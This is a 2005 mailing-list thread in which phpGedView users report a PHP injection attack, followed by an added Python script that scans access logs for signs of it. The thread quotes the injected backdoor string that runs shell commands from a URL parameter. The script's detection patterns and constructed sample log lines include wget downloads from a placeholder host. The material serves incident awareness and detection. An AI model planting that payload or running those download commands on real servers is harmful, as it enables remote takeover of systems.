RE: [Phpgedview-talk] attack attempt
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 19:57:43
Hi Matthew,

had an attack also. I am using 3.2.2. final. What is this wget?

Regards,
Heike

Matthew Gates <ma...@po...> wrote:

Hi all,

I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other fields in the user table, like this:

\';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'

From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).

Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server.

Just a heads up for everyone to keep an eye out. Grep your logs for wget.

I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:

http://www.milw0rm.com/id.php?id=1379

...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed.

Watch yourselves! I'm guessing we need a patch of some sort.

Regards,
--
Matthew
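The "grep your logs for wget" advice in the thread above, extended into a small log scan that also decodes percent-encoding before matching. This is an added example, not part of the original messages or of phpGedView; it assumes common/combined access log format, and the sample log lines, script path, `field` parameter, addresses and host name are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the message above: the command seen in the logs, the
# variable name in the injected string, and a fragment of that string.
INDICATORS = {
    "wget": re.compile(r"\bwget\b", re.I),
    "suntzu-param": re.compile(r"[?&]suntzu=", re.I),
    "php-fragment": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
}

# Common/combined log format: client, timestamp, quoted request line.
LOG_LINE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "(?P<request>[^"]*)"')


def decode(text, rounds=3):
    """Undo percent-encoding repeatedly so double-encoded requests still match."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(lines):
    """Return (client, timestamp, indicator names) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        request = decode(m.group("request"))
        names = sorted(n for n, rx in INDICATORS.items() if rx.search(request))
        if names:
            hits.append((m.group("client"), m.group("when"), names))
    return hits


# Constructed sample lines, not taken from the poster's logs. The script path,
# parameter "field", addresses and host name are placeholders.
SAMPLE = [
    '192.0.2.10 - - [20/Dec/2005:10:01:02 +0000] "GET /pgv/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Dec/2005:10:05:11 +0000] "GET /pgv/PLACEHOLDER.php?suntzu=wget%20http://example.invalid/f HTTP/1.1" 200 312',
    '198.51.100.7 - - [20/Dec/2005:10:05:40 +0000] "GET /pgv/PLACEHOLDER.php?suntzu=w%2567et%2520http://example.invalid/f HTTP/1.1" 200 312',
    '203.0.113.4 - - [20/Dec/2005:10:09:03 +0000] "GET /pgv/PLACEHOLDER.php?field=%3Berror_reporting%280%29%3B HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    for client, when, names in scan(SAMPLE):
        print(client, when, ",".join(names))
```

Access logs normally record only the request line, so injected strings submitted in POST form fields will not appear there; the stored user records are the place to look for those.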